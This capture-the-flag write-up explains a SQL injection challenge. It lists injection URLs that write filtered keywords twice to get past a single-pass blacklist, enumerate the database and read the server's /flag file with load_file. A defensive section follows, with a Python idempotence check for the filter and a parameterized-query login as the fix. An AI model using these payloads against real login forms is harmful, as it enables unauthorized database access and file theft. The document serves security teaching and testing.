http://www.bmzclub.cn/challenges#baby_sql
A simple SQL injection. Some keywords are filtered, but the filter mechanism just replaces each keyword with an empty string in a single pass, so there is an opening: bypass it by double-writing the keywords.
/check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(schema_name)/**/frofromm/**/infoorrmation_schema.schemata%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(table_name)/**/frofromm/**/infoorrmation_schema.tables/**/whwhereere/**/table_schema='geek'%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(column_name)/**/frofromm/**/infoorrmation_schema.columns/**/whwhereere/**/table_name='geekuser'%23&password=mochu7
Information obtained from the injection:
information_schema,test,mysql,performance_schema,geek
Table_in_geek: b4bsql,geekuser
Column_in_b4bsql: id,username,password
No flag-related information was found, so try reading files on the server instead.
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,load_file('/flag')%23&password=mochu7
The literal string '/flag' was echoed straight back, with no error. So load_file is presumably also being replaced with an empty string; the same trick as before applies.
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,loadload_file_file('/flag')%23&password=mochu7
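The root cause here is a single-pass keyword blacklist used as a sanitizer. The following is an added example (not code from the writeup or the challenge) showing, from the defender's side, a cheap audit check for this class of filter and the fix that removes the need for a blacklist altogether. The filter function and the sqlite3 in-memory `geekuser` table are constructed for the example; the column names id, username, password are assumed to match the challenge's table.

```python
import re
import sqlite3

# Constructed toy blacklist modelled on the challenge's filter: each keyword is
# removed with one non-recursive replace (the weak setting the writeup exploits).
BLACKLIST = ("union", "select", "from", "where", "or", "by", "load_file")


def naive_filter(value: str) -> str:
    """Single-pass keyword removal, the pattern the challenge used."""
    for word in BLACKLIST:
        value = re.sub(re.escape(word), "", value, flags=re.IGNORECASE)
    return value


def filter_is_fixpoint(filter_fn, value: str) -> bool:
    """Audit check: a removal-style sanitizer is only trustworthy if applying
    it twice changes nothing. If filter(filter(x)) != filter(x), removing one
    keyword exposed another, which is exactly the double-write weakness."""
    once = filter_fn(value)
    return filter_fn(once) == once


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's geekuser table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE geekuser (id INTEGER, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO geekuser VALUES (1, 'admin', 'secret')")
    conn.commit()
    return conn


def check_login_hardened(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: user input is bound as data and never becomes SQL
    syntax, so no keyword blacklist is needed. Returns the matching row or None."""
    cur = conn.execute(
        "SELECT id FROM geekuser WHERE username = ? AND password = ?",
        (username, password),
    )
    return cur.fetchone()


if __name__ == "__main__":
    # The blacklist is not idempotent on input that nests a keyword...
    print(filter_is_fixpoint(naive_filter, "oorrder"))   # False
    # ...and it also mangles legitimate input containing a keyword as a substring.
    print(naive_filter("password"))                        # passwd
    db = setup_db()
    print(check_login_hardened(db, "admin", "secret"))     # (1,)
    print(check_login_hardened(db, "admin' or 1=1#", "x")) # None
```

The fixpoint check is a useful unit test to attach to any hand-rolled sanitizer: if it ever fails on fuzzed input, the filter is bypassable by nesting and should be replaced, not patched with more keywords. The hardened login shows the replacement: with bound parameters the username `admin' or 1=1#` is compared as a plain string and simply does not match.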